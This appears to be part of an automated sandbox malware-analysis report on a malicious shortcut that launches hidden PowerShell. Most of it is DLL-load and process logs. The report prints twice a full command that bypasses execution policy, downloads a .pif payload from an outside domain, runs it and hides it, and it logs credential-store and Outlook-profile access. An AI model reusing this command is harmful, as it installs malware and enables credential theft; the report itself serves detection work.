                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pifJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pifJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pifJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: samlib.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Comprobante.lnk.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\screens.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\screens.pifUnpacked PE file: 4.2.screens.pif.b00000.0.unpack j1CM!e^U:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
                Source: Yara matchFile source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: screens.pif PID: 2208, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: screens.pif PID: 688, type: MEMORYSTR
                Source: screens.pif.0.drStatic PE information: section name: j1CM!e^U
                Source: screens.pif.0.drStatic PE information: section name:
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C02480FD push ebx; ret 0_2_00007FF7C024816A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C0310D6C push eax; ret 0_2_00007FF7C0310D6D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C0312530 pushad ; retf 0_2_00007FF7C0312531
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_00B481B8 pushfd ; ret 4_2_00B481BF
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_00B479E2 push esp; retf 4_2_00B479E8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D5991C push esp; iretd 4_2_02D5991D
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D51503 push ss; retf 4_2_02D51504
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D59926 push esp; iretd 4_2_02D59927
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D51522 push ebp; retf 4_2_02D51523
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE72E9 pushfd ; retf 4_2_0ABE72EA
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE72C0 pushfd ; retf 4_2_0ABE72C1
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE73D9 pushfd ; retf 4_2_0ABE73DB
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE8306 pushfd ; retf 4_2_0ABE832E
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE58E3 push 3000005Eh; ret 4_2_0ABE58F1
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE78DA pushfd ; retf 4_2_0ABE78DB
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE7061 pushfd ; retf 4_2_0ABE7062
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE7983 pushfd ; retf 4_2_0ABE7985
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE7933 pushfd ; retf 4_2_0ABE7935
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE712D pushfd ; retf 4_2_0ABE712F
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE7918 pushfd ; retf 4_2_0ABE791A
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE710F pushfd ; retf 4_2_0ABE7110
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE7968 pushfd ; retf 4_2_0ABE796A
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE714C pushfd ; retf 4_2_0ABE714E
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE6E13 pushfd ; retf 4_2_0ABE6E1E
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE77A3 pushfd ; retf 4_2_0ABE77A4
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE77D3 pushfd ; retf 4_2_0ABE77D5
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE7CAD pushfd ; retf 4_2_0ABE7CAE
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE74DC pushfd ; retf 4_2_0ABE74DD
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE75F8 pushfd ; retf 4_2_0ABE75FA
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_00402AC0 push eax; ret 5_2_00402AD4
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_00402AC0 push eax; ret 5_2_00402AFC
                Source: screens.pif.0.drStatic PE information: section name: j1CM!e^U entropy: 7.999315698306394

                Persistence and Installation Behavior

                barindex
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\screens.pifJump to dropped file
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\screens.pifJump to dropped file
                Source: C:\Users\user\Desktop\screens.pifFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)Jump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
